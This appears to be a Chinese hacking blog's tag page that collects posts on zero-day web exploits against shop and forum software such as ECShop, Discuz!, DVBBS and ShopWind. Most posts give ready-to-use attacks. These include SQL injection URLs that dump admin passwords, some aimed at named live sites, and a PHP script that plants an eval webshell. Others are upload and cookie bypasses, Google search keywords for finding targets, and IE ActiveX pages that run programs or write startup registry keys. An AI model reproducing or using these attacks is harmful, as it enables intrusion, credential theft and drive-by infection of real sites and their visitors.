浏览模式: 标准 | 列表Tag:oday

ecshop最新版(v272) 本地包含漏洞ODAY(鸡肋)

Submitted by admin
2011, January 11, 5:52 PM

注:发布本文只是出于学习的目的,请勿用无非法用途!

很久前就发现了,今天发布出来吧,其实很简单,就是很多人没有注意这里:

直接看代码:
js/calendar.php

  1. $lang = (!empty($_GET['lang']))
  2. ? trim($_GET['lang']) : 'zh_cn';//没有过滤,很明显的包含漏洞 by: ℡Mr.LP
  3.  
  4. if (!file_exists('../languages/' . $lang . '/calendar.php'))
  5. {
  6. $lang = 'zh_cn';
  7. }
  8.  
  9. require(dirname(dirname(__FILE__)) . '/data/config.php');
  10. header('Content-type: application/x-javascript; charset=' . EC_CHARSET);
  11.  
  12. include_once('../languages/' . $lang . '/calendar.php');//这里包含,需要截断 by: ℡Mr.
复制代码

测试代码 :

// 需要 magic_quotes_gpc = Off

/js/calendar.php?lang=../index.php%00.(注意后面有个.)by: ℡Mr.LP

利用:

注册用户

然后上传GIF89a头的GIF文件欺骗,

然后包含 如:[img]http://www.lpboke.com/js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00.

Tags: ecshop, oday

V5-SHOP商城0day

Submitted by admin
2010, August 6, 10:43 PM

因为是.net 程序,

此漏洞可威胁服务器安全,

暂且发布暴管理帐号信息,

影响版本:只测试最新的,旧版本也测试了几个,都OK。

程序介绍:.net 的在线商城系统

以下是测试EXP:
cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 –

暂未通知官方修补。

转载请注名本站原创!!

本篇文章来源于 Any_size|反入侵小组 原文链接:http://www.17hack.com/news/sort02/News-1219.html

Tags: v5shop, oday

无忧购物时尚ASP版 oday

Submitted by admin
2010, July 16, 7:01 PM

FROM http://www.st999.cn 

by 流浪的风

程序:无忧购物时尚ASP版

跟网趣一样的找回密码漏洞,username未过滤,导致注入发生,这里就不演示了,网趣的这个漏洞挺老的了。

另外一个跟shopxp一样的TEXTBOX.ASP存在注入漏洞

Action=LCase(Request.QueryString("Action"))
newsID=Request.QueryString("newsID")

If request("action")="modify" Then
set rs=server.createobject("adodb.recordset")
sql="select * From shop_zhuanti where newsid="&newsid
rs.open sql,conn,1,1
 If Not rs.Eof Then
  Content=rs("Content")
 End If
 Response.Write Content
End If

newsid并未过滤,直接代入执行sql。

利用:

http://192.168.1.106/TEXTBOX.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,3,admin%2bpassword,5,6,7,8%20from%20shop_admin

 

http://www.wy1314.com/wyshop/TEXTBOX.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,3,admin%2bpassword,5,6,7,8%20from%20shop_admin


http://www.tsjbb.com/TEXTBOX.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,3,admin%2bpassword,5,6,7,8%20from%20shop_admin


http://www.gdwndq.com/wyshop/TEXTBOX.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,3,admin%2bpassword,5,6,7,8%20from%20shop_admin

 

拿到用户名和密码,解密,进入后台,找上传点,存在着上传漏洞,直接拿shell。

进入后台,商品管理-商品添加-上传小图片,(广告管理-广告设置这里也有个上传点)在弹出的窗口中,查看源码,在action前面直接添加网站域名,并在后面

<input type="hidden" name="filepath" value="shoppic/st999.asp;aaa/">

把filepath的值修改为st999.asp;aaaa/

本地保存并上传,再查看源码就OK了

我就不搞了,刚刚本地试验还成功来着,http://www.tsjbb.com/这个就不成功了,提示写入失败,郁闷。。。

也不截图什么的了,老婆催了,出去玩了。。。

Tags: 无忧, oday

ECSHOP 2.7.X注入漏洞_20100507

Submitted by admin
2010, May 10, 11:21 AM

看到有人贴公告了...我就发几个poc吧......
反正是要臭街的东西了....

http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC#
goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filte
r_attr=-999
Test it :
http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%
23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&fil
ter_attr=-999%20OR%20length(session_user())=14%20or%201=2 //判断session_user长度是否是14位
http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%
23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&fil
ter_attr=-999%20OR%20length(session_user())=15%20or%201=2 //判断session_user长度是否是15位
http://127.0.0.1/category.php?page=1&sort=goods_id&order=asc&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999 OR ASCII(MID(UPPER((select password FROM ecs_admin_user WHERE user_id=1)),{inj},1))={inj} OR 1=2
第一个{inj}是要猜解密码的第几位.第二个是对应的ascii
 
ps:为啥我老用别人的马甲呢?rey这个马甲又登录不上去了.我很蛋疼啊,求关注
利用方法:
访问
[url]http://127.0.0.1/category.php?page=1&sort=goods_id&order=asc&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20[/url][color=Red]1=1[/color]%20OR%201=2
[url]http://127.0.0.1/category.php?page=1&sort=goods_id&order=asc&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20[/url][color=Red]1=2[/color]%20OR%201=2
可以看到网页的区别.可以抓取商品图片的链接作为关键字如
images/200905/thumb_img/9_thumb_G_1241511871555.jpg
爆用户名的语句为
[url]http://127.0.0.1/category.php?page=1&sort=goods_id&order=asc&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999[/url] OR ASCII(MID(UPPER((select user_name FROM ecs_admin_user WHERE user_id=1)),{inj},1))={inj} OR 1=2
其他的...大家就灵活运用吧
来源:t00ls

附件: helper.rar (6.03 K, 下载次数:150)

最新DVBBS8.0以上版本后台提升webshell 0day

Submitted by admin
2010, April 30, 8:48 AM

转载请著名出处,char's blog http://www.mm9.com.cn/a/18.html

如果服务器支持PHP,那么,在版块设置里面对某某版块设置上传格式里面增加php,可以传成功。上传地址在后台文件管理处查看。

这次这个后台提权漏洞是上个星期无意中发现的。

1、登录后台,风格界面-模板导出  在附加说明处写入一句话木马

大小: 30.08 K
尺寸: 500 x 185
浏览: 65 次
点击打开新窗口浏览全图

2、点击“导出”成功导出到skins下面的dv_skin.mdb

大小: 10.78 K
尺寸: 500 x 72
浏览: 58 次
点击打开新窗口浏览全图

3、选择数据处理-备份数据库  如图填写

(../skins/dv_skin.mdb已经存在了我们的一句话,然后我们把他备份为XX.mdb-因为dvbbs8以上后,就对备份的数据库名称做了严格判断,只有当后缀是.mdb的时候才能备份成功,所以我这里填char.mdb 。中间备份数据库目录 以XX.ASP的格式写入,不存在,他就自动创建。这就利用了IIS6.0的解析漏洞了。我们看下面就能看明白)

大小: 47.75 K
尺寸: 500 x 219
浏览: 64 次
点击打开新窗口浏览全图

4、点击确定,得到地址,使用一句话木马连接,后台获取webshell成功。

大小: 9.81 K
尺寸: 500 x 72
浏览: 59 次
点击打开新窗口浏览全图

5.一句话木马地址 例: http://www.mm9.com.cn/bbs/a.asp/char.mdb

使用一句话木马连接端连接.

大小: 94.8 K
尺寸: 500 x 338
浏览: 93 次
点击打开新窗口浏览全图

Tags: oday, dvbbs

shopwind oday 分析

Submitted by admin
2010, April 15, 11:17 PM

FROM http://www.st999.cn/blog   http://forum.daokers.com/  

BY 流浪的风   2010-4-15

程序shopwind网店系统1.02的

漏洞:cookies欺骗,上传漏洞,fckeditor编辑器漏洞

1) cookies欺骗进后台

程序做了防注入,防注入文件里过滤了post get cookie三种试,,我也就没找注入漏洞了。。。

看了下后台,竟然是cookie验证,文件是admin_judge.asp,源码如下:

<%
if request.cookies("admin_name")="" then
   response.redirect "login.asp"
end if
%>

呵呵,,只要使admin_name不为空就行了,简单的很。。。

读取一下正常的cookies,并复制以下数据到啊D的cookie修改栏里,

visit=27743472; AQJXOZZHGGUGLWJSUNQM=RGQJLLVJKNHWGTOFRGZJNUXOPVMZVXFNYLDCTDYE; admin_name=admin

点击修改,见图

大小: 52.1 K
尺寸: 500 x 300
浏览: 67 次
点击打开新窗口浏览全图

把login.asp去掉,直接回车登录,就进入后台管理页面了。。。

大小: 89.86 K
尺寸: 500 x 344
浏览: 59 次
点击打开新窗口浏览全图

 

2)上传漏洞拿shell

点击商品添加,来到上传页面。

大小: 24.79 K
尺寸: 500 x 84
浏览: 46 次
点击打开新窗口浏览全图

因为public目录下的uploadimg.asp文件做了图片验证,无法上传JPG格式的asp马,

直接cmd下用copy合并二进制就可上传,上传后的是a.asp;a.jpg格式,不改名。

而且还可以修改成这样的:admin/upfile/Upload.asp?action=ok&U_type=3&PicPath=a.asp

这个是需要本地构造,有兴趣的朋友还可以研究一下。

会在网站的根目录下会生成个imagesa.asp的文件夹,呵呵。。。上传漏洞危害太大哦。。。

 

本人愚笨,在YD的闷豆他们提醒下,才发现自己的平台搭建错误,用的是netbox,怪不得不能解析,又在熙雅MM的演示下,才悲哀的发现,原来自己一直喜欢用的那个一句话,还真不如lake2的一句话,所以,为了大家跟我走同样的错误的路,我直接上传上来了。。。

上传文件中的a.asp;.jpg就可以了,密码是st999,我的blog是http://www.st999.cn/blog,大家别社工我就成了,呵呵。。。

3)Fckeditor编辑器漏洞

这个洞不用说了,大家都知道的。。

利用:fckeditor/editor/filemanager/connectors/asp/upload.asp

利用源码:

<form id="frmUpload" enctype="multipart/form-data" action="http://www.st999.cn/blog/admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
www.st999.cn/blog改成你要拿的站的网址就可以了。。。

 

 GOOGLE搜索关键字:intext:Powered by ShopWind  

大家也可以换成别的关键字,搜索的程序也许会更多,好像是可以通杀这个程序的吧,我也没时间去试,熙雅这家伙已经去批量了,不知道还剩多少可以给大家玩呢,反正我是不搞批量的。。。

 大小: 61.12 K
尺寸: 500 x 440
浏览: 48 次
点击打开新窗口浏览全图

大小: 104.86 K
尺寸: 500 x 324
浏览: 45 次
点击打开新窗口浏览全图

附件: lake2一句话.rar (15.62 K, 下载次数:63)

Tags: shopwind, oday

云起企业建站系统通杀oday

Submitted by admin
2010, February 6, 2:02 PM

文章作者:围剿
文章来源:邪恶十进制--中国邪客  www.dosjj.com

为什么说是通杀呢
   因为这个系统虽然是版本提高了不少   但是漏洞依然存在 而且很明显
使我等小菜爽了一把。。

   话说无聊去代码网站下套程序分析分析
可到了这个云起企业建站系统   下载数挺多的 于是乎看了起来
   首先看到了它的后台login.asp文件。。一看   边觉得蛋疼。。。 


if request.Form("submit")<>"" then
if request.Form("userid")="" or request.Form("password")="" then
response.Write("<script language=javascript>alert('用户名或者密码不能为空!');history.back();</script>")
response.end
end if

set rs=conn.execute("select * from gly where uid='"&trim(request.form("userid"))&"' and pwd='"&trim(request.form("password"))&"'")
if rs.eof then
response.Write("<script language=javascript>alert('用户名或者密码验证失败!');history.back();</script>")
response.End()
else
if rs("IsSuper")=1 then
   session(strSession&"uid")="s"
   session(strSession&"uidn")=rs("id")
else
   session(strSession&"uid")="n"
   session(strSession&"uidn")=rs("id")
end if
response.Redirect("index.asp")
response.End()
end if
rs.close
set rs=nothing
end if

大家 看到没只用trim函数过滤了空格。这样一来就直接出现了从客户端传递过来的数据,直接带入数据库查询了,这样我们就可以用'or'='or'登陆了

真是啊 。。什么年代了 还有这样的情况。。。

再来看看进去后台之后的上传文件。。

部分代码:

<title>上传文件</title>
<link href="css.css" rel="stylesheet" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body bgcolor="#eeeeee" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form enctype="multipart/form-data" method="post" action="infopict.asp?fm=<%=request.QueryString("fm")%>&em=<%=request.QueryString("em")%>" name="form1">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>

我找了很久以为还是找错了上传文件   因为我没看到上传类型的过滤代码。。
但是 确定之后   就是这个文件   因此蛋疼继续。。。

那就是说没过滤任何文件了   直接可以传咯。。

实在不怎样 。。编辑器版本由原来的ewebeditor转换为FCKeditor
后台做了安全验证   FCKeditor利用不了的   但是往往程序员忽略了最重要的漏洞。。

google关键字:inurl:arti_show.asp?id=
后台地址:management/login.asp
万能密码登陆   'or'='or'
后台可以直接上传文件

Tags: oday

Discuz! 6.x/7.x SODB-2008-13 Exp

Submitted by admin
2010, January 29, 10:35 AM

#!/usr/bin/php
<?php
/**
* Discuz! 6.x/7.x SODB-2008-13 Exp
* By www.80vul.com
* 文件中注释的变量值请自行修改
*/

$host = 'www.80vul.com';
// 服务器域名或IP
$path = '/discuz/';
// 程序所在的路径
$key  = 0;
// 上面的变量编辑好后,请将此处的值改为1

if (strpos($host, '://') !== false || strpos($path, '/') === false || $key !== 1)
exit("专业点好不,先看看里面的注释 -,-\n");

error_reporting(7);
ini_set('max_execution_time', 0);

$key = time();
$cmd = 'action=register&username='.$key.'&password='.$key.'&email='.$key.'@80vul.com&_DCACHE=1';
$resp = send();

preg_match('/logout=yes&amp;formhash=[a-z0-9]{8}&amp;sid=([a-zA-Z0-9]{6})/', $resp, $sid);

if (!$sid)
exit("哦,大概是没有开启WAP注册吧 -,-\n");

$cmd = 'stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid='.$sid[1].'&creditsformula=${${fputs(fopen(chr(46).chr(46).chr(47).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(101).chr(118).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(56).chr(48).chr(118).chr(117).chr(108))}}';
send();

$shell = 'http://'.$host.$path.'forumdata/cache/eval.php';

if (file_get_contents($shell) == '80vul')
exit("好了,去看看你的WebShell吧:\t$shell\n里面的代码是:\t<?eval(\$_POST[c])?>\n别告诉我你不会用 -,-\n");
else
exit("嗯,大概是该网站不存在漏洞,换一个吧 -,-\n");

function send()
{
global $host, $path, $url, $cmd;

$data = "POST ".$path."wap/index.php  HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Referer: http://$host$path\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "Connection: Close\r\n";
$data .= "Content-Length: ".strlen($cmd)."\r\n\r\n";
$data .= $cmd;

$fp = fsockopen($host, 80);
fputs($fp, $data);

$resp = '';

while ($fp && !feof($fp))
$resp .= fread($fp, 1024);

return $resp;
}

?>
Tags: oday, exp, discuz

来源:坏人咖啡的窝

这个代码会写入启动项,各位看官测试的时候注意了,不会当时生效,重启后可见效果!

测试代码:


<html>  

<object classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' id='target' ></object>
<script language='vbscript'>  

targetFile = "c:\WINDOWS\system32\wshom.ocx"
prototype  = "Sub RegWrite ( ByVal Name As String ,  ByRef Value As Variant ,  [ ByRef Type As Variant ] )"
memberName = "RegWrite"
progid     = "IWshRuntimeLibrary.IWshShell_Class"
argCount   = 3  

D3V!L FUCKER="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
germaya_x="C:\WINDOWS\system32\calc.exe"
his0k4="REG_SZ"  

target.RegWrite D3V!L FUCKER ,germaya_x ,his0k4
</script>
Tags: oday, ie

来源:坏人咖啡的窝

这段代码在SP3+IE6下测试成功

测试代码:


<html>

<p align="left"><b><font face="Segoe Script" size="7">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

</font></b></p>

<p>

<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target' ></object>

<script language='vbscript'>

arg1="c:\WINDOWS\system32\calc.exe"

target.Exec arg1

</script></p>

有兴趣的同学可以回去搞一下,弄个网马出来!

-----------------------

代码保存为html格式的,本地运行了下,还能跳出计算器,很强大,我的补丁都打了。。。

Tags: oday, ie

EdhBBS 0day

Submitted by admin
2010, January 3, 12:49 AM

关键字:   inurl:EdhBBS

漏洞文件:EdhBBS/FileUpLoad.asp
抓包上传的图片小马
按下图做修改:

clip_image002.jpg (55.7 KB)
2009-12-24 13:00

把JPG直接改为asp,不用在后面加空格
最后用nc上传提交就行了
nc www.xxxxx.com 80 <1.txt
clip_image001.jpg (9.9 KB)
2009-12-24 13:00
成功得到shell???????????
祝大家圣诞快乐(*^__^*) 嘻嘻……
udb311兄弟的提议:
UpLoads/2009-12-24(16-20-49).ASA ``````
本地构造也行哦。不用NC```
代码:
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>论坛文件上传</title>
<style type="text/css">
<!--
body {
        margin-left: 0px;
        margin-top: 0px;
        margin-right: 0px;
        margin-bottom: 0px;
        font-size:9pt;
}
input{height:19px;font-size:9pt;}
table{font-size:9pt;}
-->
</style></head>
<body scroll="no" onLoad="window.setTimeout('document.body.style.backgroundColor=parent.PadBgColor;',30);">
<form name="form1" enctype="multipart/form-data" method="post"
        action="http://www.XXX.com/EdhBBS/FileUpLoad.asp" target="_self" onSubmit="ExtNameChk()"
style="margin:0;padding:0">
<input type="file" name="file">
<input name="ExtName" type="hidden" id="ExtName">
<input type="submit" name="Submit" value="上传附件">
<label></label>
</form>
</body>
<script language="JavaScript" src="

来源:16system.cn

Tags: edhbbs, oday
Records:1812